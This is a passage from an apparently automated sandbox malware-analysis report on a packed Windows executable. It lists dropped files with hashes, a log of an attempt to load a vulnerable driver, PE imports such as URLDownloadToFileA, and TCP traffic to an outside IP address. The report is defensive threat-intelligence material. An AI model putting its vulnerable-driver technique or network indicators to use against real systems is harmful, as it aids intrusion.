                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                        Joe Sandbox View:
                                                                                        • Filename: PPLKiller.exe, Detection: malicious, Browse
                                                                                        • Filename: xd.exe, Detection: malicious, Browse
                                                                                        • Filename: xd.exe, Detection: malicious, Browse
                                                                                        • Filename: xd.exe, Detection: malicious, Browse
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........H8.)V..)V..)V...O..)V..)W..)V.2!-..)V..!;..)V.2!...)V.Rich.)V.........PE..d....T.W.....................................................................`......L........................................................P..<............@..`.................................................................... ...............................text...d........................... ..h.rdata..,.... ......................@..H.data...X....0......................@....pdata..`....@......................@..HINIT....X....P...................... ...................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Windows\Vulnerability.exe

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\lUAc7lqa56.exe
                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):145408
                                                                                        Entropy (8bit):6.159203978020291
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:nvJpbB++pE3j0XJwH464mIWeBq/y9Dqp2k:xpbBhpE3jQwY6BP/Kkx
                                                                                        MD5:8619AFEC8BD66B2C589FC987D7D0B194
                                                                                        SHA1:095C0CC0F2B79CB1D8B8D6CFD453ACA3111C5DC6
                                                                                        SHA-256:4423F74778917B5BDA37B9DB045291CC980D99376E4818AF113FEE4F8D92EFD3
                                                                                        SHA-512:424E0067360DFC6845F3D028BCDC80F0AAFA843752C084BBA192BEAD6AD705356F3D78507E5A21F4C67FB61CE6F4834EEF113363B6C62E507CCAC86DBC8C61BB
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 55%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}..89..k9..k9..k0..k/..k?..j3..k?..j=..k?..j...k?..j?..kr..j(..k9..k1..kV..j>..kV.ck8..kV..j8..kRich9..k........PE..d...>..f.........."....&.N...........H.........@.............................p............`..........................................................P.......@..0............`..........p.......................(...p...@............`...............................text....L.......N.................. ..`.rdata.......`.......R..............@..@.data........0......................@....pdata..0....@.......$..............@..@.rsrc........P.......4..............@..@.reloc.......`.......6..............@..B................................................................................................................................................................................................................................................................

                                                                                        C:\Windows\driverfo.sys

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\lUAc7lqa56.exe
                                                                                        File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):19712
                                                                                        Entropy (8bit):6.43600081360648
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:OGTpcx5nF14z5KreVeNyno8E9VFzSJIVGzJnIZ:O5nFYz/EsG
                                                                                        MD5:4A4A6A5F82ECB5F56F3C4C919E5B74C2
                                                                                        SHA1:04F1E57E0333F49F65DBE5E0BC98DD667F819435
                                                                                        SHA-256:27DFFDB37542AED81486B8E58762B36FC5AB4E48B76BA0AF670D13D7D78498D5
                                                                                        SHA-512:6B47DBDD1702ABCF65E147A31B181F2DF6BCDEA7D332DDD8C8113D2022382323CE44C4706A58D4C9DC1D211F588F880968CB4364134AE4CC9C8D430AA01504C5
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 33%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........A..U ..U ..U ..U ..T ...X..V ..U ..N ...X..S ...X..P ..:...T ..:...T ..RichU ..................PE..d......g.........."....&.......................@....................................c^....`A.................................................`..(............P.......*...#...p..$...`2..8........................... 1..@............0...............................text............................... ..h.rdata..P....0......................@..H.data........@....... ..............@....pdata.......P......."..............@..HINIT.........`.......$.............. ..b.reloc..$....p.......(..............@..B................................................................................................................................................................................................................................................................................

                                                                                        C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb

                                                                                        Download File
                                                                                        Process:C:\Windows\Vulnerability.exe
                                                                                        File Type:MSVC program database ver 7.00, 1024*915 bytes
                                                                                        Category:dropped
                                                                                        Size (bytes):936960
                                                                                        Entropy (8bit):5.437833471017948
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:SQmdQgYdje3k8tHhphHqBtNoJEGqpoG6C2O4zT8XwujLUu9YAjNk5Jrg:WzTlblqDpkCtST81Sh
                                                                                        MD5:C253723686BE0E215A3CE10D77B3BF02
                                                                                        SHA1:FD4B82FC23BED476A4264A28F5CFA86734CAB337
                                                                                        SHA-256:4EF01E1F382BCB1466ECDA5266BD36A57C1B74850C8F7A771CF54F604E4EC921
                                                                                        SHA-512:D6353B07D59F5C3239B454A74CBE7D88B59EACAF6062E5F880F079AC10FEE27CED81ED7C5E9C4751FF1E5DC69E6F0C811B9C5735500F517FD7038D5626BDD464
                                                                                        Malicious:false
                                                                                        Preview:Microsoft C/C++ MSF 7.00...DS...............8...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5

                                                                                        Download File
                                                                                        Process:C:\Windows\Vulnerability.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):32
                                                                                        Entropy (8bit):3.6556390622295662
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:AOGTdTH1XUR6fD9:A3dhE8r9
                                                                                        MD5:E843175A37A55B7CDC2AE42AF2870D91
                                                                                        SHA1:81E86F2A168E618243262133CD2FA8CE9295DBBD
                                                                                        SHA-256:ED4A338141F7666970C557783A8F50202240D1D0D1B3E7A44927B03E9F450E89
                                                                                        SHA-512:C772C542C28896DFA9272B303AD9CD8A762A842D756924CD8F8B93283F48EF51317199BA9B6A94233581C65EF487AFC167470F427D16B091F3E00A1920825CA3
                                                                                        Malicious:false
                                                                                        Preview:c253723686be0e215a3ce10d77b3bf02

                                                                                        \Device\ConDrv

                                                                                        Download File
                                                                                        Process:C:\Windows\Vulnerability.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):153
                                                                                        Entropy (8bit):4.738222397336456
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:m4FkwF40XGA7cqQ9FE1nLxv+FTfh2DaG/dv4FBOBFRecWgFmWErXTMGGMFU2LAXS:m4Gw4uX7cFknLp6TYDaiv4FBK3WgFmDL
                                                                                        MD5:61214C9263C6CC82FA1CBB0D18E0648C
                                                                                        SHA1:0D66013B6BFFAF15D32FF91CA59E357DA6A4B898
                                                                                        SHA-256:8C0B91381F8A248EA3C99639844B7A501AD54EAD3C6561288361B634046A1244
                                                                                        SHA-512:6A620AF44AD7AA4F978945EAA6CD351AF3B8AF5D8A81FF3D8B13E1365AF784A81951C350A91FFCBE078098D89FF7D5B3208CD9B980F8154C1848B5B6CE25C627
                                                                                        Malicious:false
                                                                                        Preview:[<] Loading vulnerable driver, Name: nULoYBmSWb..[+] NtLoadDriver Status 0xc0000001..[-] Failed to register and start service for the vulnerable driver..

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:PE32+ executable (console) x86-64, for MS Windows
                                                                                        Entropy (8bit):7.917180916779669
                                                                                        TrID:
                                                                                        • Win64 Executable Console (202006/5) 92.65%
                                                                                        • Win64 Executable (generic) (12005/4) 5.51%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                        • DOS Executable Generic (2002/1) 0.92%
                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                        File name:lUAc7lqa56.exe
                                                                                        File size:6'062'592 bytes
                                                                                        MD5:4c428e14cf5fc2c5e54ba377389c8253
                                                                                        SHA1:bb3972cfb6adc178d8fd17dde519d15a6471e4b9
                                                                                        SHA256:f142f2fefbbd174fbc0d3d6cbe4cb5caa48389dfce9ee63f10d82b503e705468
                                                                                        SHA512:c82384b5027e51268cd09ffb0f56baece56235cf369ccf75178351d010e9be591e0f805f5ad50a8b9e3d328ce3c111a7a0b2cda004f7a778b1a94eefa5e4102b
                                                                                        SSDEEP:98304:gpWXpGEOHr+mg3awzDSS/GLjqdRK47nr+ktzLy7Mb7hMUwcIesBw1W:gpWPKrtOawXTu/qdRJrSkt3Tb7hMUNIk
                                                                                        TLSH:DF5623BE624C371CC01F84748023AD45B1F7523E4AEA95AAB2DBFF90779B421D606F46
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......g.........."....&............w.X........@.............................@............`................................

                                                                                        File Icon

                                                                                        Icon Hash:90cececece8e8eb0

                                                                                        Static PE Info

                                                                                        General

                                                                                        Entrypoint:0x14058a877
                                                                                        Entrypoint Section:.vmp1
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x140000000
                                                                                        Subsystem:windows cui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x6712F9EE [Sat Oct 19 00:14:38 2024 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:6
                                                                                        OS Version Minor:0
                                                                                        File Version Major:6
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:6
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:f86f1d8dc6f11a3ff46c688154b1d7e2

                                                                                        Entrypoint Preview

                                                                                        Instruction
                                                                                        push EE9D845Ch
                                                                                        call 00007F55E5C224CFh
                                                                                        xor byte ptr [esi], dl
                                                                                        add eax, 75BD4BCAh
                                                                                        jmp far 697Dh : 9047E1CEh
                                                                                        cmp dword ptr [ebx-21CEF4B0h], eax
                                                                                        add bl, byte ptr [esi-11h]
                                                                                        into
                                                                                        push esp
                                                                                        and eax, 92697C1Fh
                                                                                        jmp far fword ptr [ecx]
                                                                                        pop ss
                                                                                        xor dword ptr [edi], esp
                                                                                        xor byte ptr [eax-4AE63114h], al
                                                                                        pushfd
                                                                                        jns 00007F55E578310Bh
                                                                                        push eax
                                                                                        push 183115ACh
                                                                                        adc dword ptr [ebx+5Ah], FFFFFF97h
                                                                                        pop ss
                                                                                        call far DFB7h : 7ACEFCCDh
                                                                                        add eax, 3A857831h
                                                                                        xchg eax, edx
                                                                                        xchg eax, esi
                                                                                        pop ebx
                                                                                        adc edx, edi
                                                                                        in al, CEh
                                                                                        sub al, A0h
                                                                                        hlt
                                                                                        add byte ptr [ecx], dh
                                                                                        push es
                                                                                        push dword ptr [ebp-5AB4696Dh]
                                                                                        cmp eax, FFFFFFCEh
                                                                                        pop esi
                                                                                        cli
                                                                                        sub al, byte ptr [ebx]
                                                                                        xor dword ptr [eax], eax
                                                                                        adc edi, edx
                                                                                        dec esi
                                                                                        xchg eax, edi
                                                                                        sbb dword ptr [eax-66h], edi
                                                                                        int 39h
                                                                                        cmp dword ptr [ebp-22621C90h], ecx
                                                                                        sub dword ptr [eax+398CFA0Fh], edi
                                                                                        cmp dword ptr [ebp+45291470h], ecx
                                                                                        imul ecx, dword ptr [edx+29h], DA1E79ECh
                                                                                        and al, FAh
                                                                                        pop ecx
                                                                                        shl dword ptr [ebx], 1
                                                                                        add dword ptr [edi], edx
                                                                                        cwde
                                                                                        jno 00007F55E578310Bh
                                                                                        inc ebx
                                                                                        jmp 00007F55B1235520h
                                                                                        arpl si, sp
                                                                                        jnbe 00007F55E5783114h
                                                                                        shl byte ptr [ebx], FFFFFFE5h
                                                                                        or byte ptr [edi+ebx+28h], bh
                                                                                        or esp, dword ptr [esi]
                                                                                        or dword ptr [edi-6Ah], ecx
                                                                                        jmp dword ptr [edi+6Fh]
                                                                                        les ebx, fword ptr [esi]
                                                                                        or ebx, dword ptr [eax-009F170Dh]
                                                                                        loope 00007F55E5783113h
                                                                                        inc ecx
                                                                                        xchg eax, edx
                                                                                        or al, byte ptr [esi]
                                                                                        sub eax, E164E7B8h
                                                                                        shr byte ptr [esi+32h], 0000003Bh
                                                                                        in al, dx

                                                                                        Data Directories

                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x4c5ca80xc4f.vmp1
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x8f53c00x2a8.vmp1
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xa530000x1e0.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0xa474100xa56c.vmp1
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xa520000xe4.reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x5a17100x30.vmp1
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa472d00x140.vmp1
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x4b60000x270.vmp1
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                        Sections

                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x10000xb99700x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rdata0xbb0000x265540x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .data0xe20000x1d7a00x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .pdata0x1000000x780c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        _RDATA0x1080000x1d00x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .vmp00x1090000x380a2f0x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_NOT_PAGED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .vmp10x48a0000x5c797c0x5c7a000feb73a506b1582cbc435d4bee9510d6unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_NOT_PAGED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .reloc0xa520000xe40x2009b33d1f688718def130034d085825231False0.36328125GLS_BINARY_LSB_FIRST2.173872001848127IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .rsrc0xa530000x1e00x200b3134e158e6baa876b065089e31fa7baFalse0.5390625data4.765699291355714IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                        Resources

                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        RT_MANIFEST0xa530580x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143

                                                                                        Imports

                                                                                        DLLImport
                                                                                        KERNEL32.dllWaitForSingleObjectEx
                                                                                        USER32.dllLoadCursorA
                                                                                        MSVCP140.dll?_Lock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAAXXZ
                                                                                        d3d9.dllDirect3DCreate9Ex
                                                                                        dwmapi.dllDwmExtendFrameIntoClientArea
                                                                                        urlmon.dllURLDownloadToFileA
                                                                                        CRYPT32.dllCertFreeCertificateChainEngine
                                                                                        IMM32.dllImmReleaseContext
                                                                                        Normaliz.dllIdnToAscii
                                                                                        WLDAP32.dll
                                                                                        WS2_32.dllgetsockname
                                                                                        RPCRT4.dllRpcStringFreeA
                                                                                        PSAPI.DLLGetModuleInformation
                                                                                        USERENV.dllUnloadUserProfile
                                                                                        VCRUNTIME140_1.dll__CxxFrameHandler4
                                                                                        VCRUNTIME140.dll__C_specific_handler
                                                                                        api-ms-win-crt-runtime-l1-1-0.dll_configure_narrow_argv
                                                                                        api-ms-win-crt-stdio-l1-1-0.dll_lseeki64
                                                                                        api-ms-win-crt-heap-l1-1-0.dllrealloc
                                                                                        api-ms-win-crt-time-l1-1-0.dll_gmtime64
                                                                                        api-ms-win-crt-utility-l1-1-0.dllqsort
                                                                                        api-ms-win-crt-filesystem-l1-1-0.dll_stat64
                                                                                        api-ms-win-crt-convert-l1-1-0.dllstrtoul
                                                                                        api-ms-win-crt-string-l1-1-0.dlltolower
                                                                                        api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale
                                                                                        api-ms-win-crt-math-l1-1-0.dllceilf
                                                                                        ADVAPI32.dllOpenProcessToken
                                                                                        SHELL32.dllShellExecuteA
                                                                                        WTSAPI32.dllWTSSendMessageW
                                                                                        KERNEL32.dllGetSystemTimeAsFileTime
                                                                                        USER32.dllGetUserObjectInformationW
                                                                                        KERNEL32.dllLocalAlloc, LocalFree, GetModuleFileNameW, GetProcessAffinityMask, SetProcessAffinityMask, SetThreadAffinityMask, Sleep, ExitProcess, FreeLibrary, LoadLibraryA, GetModuleHandleA, GetProcAddress
                                                                                        USER32.dllGetProcessWindowStation, GetUserObjectInformationW

                                                                                        Possible Origin

                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                        EnglishUnited States

                                                                                        Network Behavior

                                                                                        Network Port Distribution

                                                                                        TCP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Oct 25, 2024 08:10:11.578612089 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:11.584229946 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:11.584315062 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:11.584738970 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:11.590161085 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.274135113 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.274187088 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.274224043 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.274425030 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.274425030 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.274425030 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.274604082 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.274640083 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.274828911 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.274828911 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.275073051 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.275108099 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.275142908 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.275156975 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.275156975 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.275233030 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.275887966 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.275923014 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.275953054 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.275988102 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.280404091 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.280436993 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.280472040 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.280591011 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.280591011 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.280591965 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.392649889 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.392667055 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.392683029 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.392879009 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.392879009 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.393162966 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.393368006 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.398094893 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.398111105 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.398166895 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.398207903 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.398736954 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.398752928 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.398814917 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.398814917 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.403346062 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.403362036 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.403377056 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.403630018 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.403630972 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.403953075 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.403970003 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.404151917 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.404151917 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.408663034 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.408678055 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.408751965 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.409183025 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.409198999 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.409219980 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.409394979 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.409394979 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.414031029 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.414066076 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.414208889 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.414208889 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.414439917 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.414474964 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.414496899 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.414532900 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.419291973 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.419346094 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.419378996 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.419399977 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.419399977 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.419486046 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.419595957 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.419787884 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.511046886 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.511164904 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.511226892 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.511241913 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.511241913 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.511399031 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.511584997 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.511619091 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.511631966 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.511655092 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.511697054 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.511697054 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.512186050 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.512238979 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.512646914 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.512662888 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.512725115 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.512726068 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.512850046 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.512866020 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.512896061 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.512963057 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.513348103 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.513362885 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.513395071 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.513427973 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.513880014 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.513895988 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.513930082 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.513962984 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.514316082 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.514338970 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.514354944 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.514368057 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.514401913 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.514401913 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.515489101 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.515505075 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.515520096 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.515541077 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.515583038 CEST4973080192.168.2.4185.101.104.122
